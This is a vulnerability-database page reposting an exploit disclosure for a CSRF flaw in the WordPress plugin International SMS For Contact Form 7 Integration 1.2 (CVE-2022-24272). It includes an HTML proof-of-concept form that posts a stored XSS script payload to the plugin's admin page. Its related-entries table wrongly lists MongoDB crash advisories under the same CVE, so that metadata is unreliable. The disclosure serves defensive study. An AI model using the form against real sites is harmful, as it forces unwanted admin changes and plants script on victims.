Lucene search
K

WordPress International SMS For Contact Form 7 Integration 1.2 CSRF Vulnerability

🗓️ 14 Feb 2022 00:00:00Reported by Milad karimiType 
zdt
 zdt
🔗 0day.today👁 428 Views

WordPress International SMS For Contact Form 7 Integration 1.2 CSRF Vulnerability. Lacks CSRF check, allowing unwanted actions and potential Stored Cross-Site Scripting issue

Related
Code
ReporterTitlePublishedViews
Family
ATTACKERKB
CVE-2022-24272
21 Apr 202217:19
attackerkb
Circl
CVE-2022-24272
21 Apr 202214:26
circl
CNNVD
WordPress plugin cf7-international-sms-integration 代码注入漏洞
14 Feb 202200:00
cnnvd
CVE
CVE-2022-24272
21 Apr 202210:45
cve
Cvelist
CVE-2022-24272 MongoDB Server (mongod) may crash in response to unexpected requests
21 Apr 202210:45
cvelist
Debian CVE
CVE-2022-24272
21 Apr 202210:45
debiancve
EUVD
EUVD-2022-29179
3 Oct 202520:07
euvd
MongoDB
MongoDB Server (mongod) may crash in response to unexpected requests
11 May 202200:00
mongodb
NVD
CVE-2022-24272
21 Apr 202211:15
nvd
OSV
BIT-MONGODB-2022-24272 MongoDB Server (mongod) may crash in response to unexpected requests
6 Mar 202410:57
osv
Rows per page
# Exploit Title: WordPress Plugin International Sms For Contact Form 7 Integration V1.2 - Cross-Site Request Forgery (CSRF)

# Author: Milad Karimi 

# Software Link: https://wordpress.org/plugins/cf7-international-sms-integration/

# Version: 1.2

# Tested on: Windows 11

# CVE: CVE-2022-24272


1. Description:

The plugin International Sms For Contact Form 7 Integration for class-sms-log-display.php and was lacking CSRF check, allowing attackers to make logged in users perform unwanted actions, such as change the calculator headers. 

Due to the lack of sanitisation, this could also lead to a Stored Cross-Site Scripting issue




2. Proof of Concept:




<form method="post" action="https://example.com/cf7-international-sms-integration/includes/admin/class-sms-log-display.php?page=">

    <input type="text" value="<script>alert(1)</script>" name="fcw[fcw_heading]">

    <input type="submit" value="Save" name="submit">

</form>

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation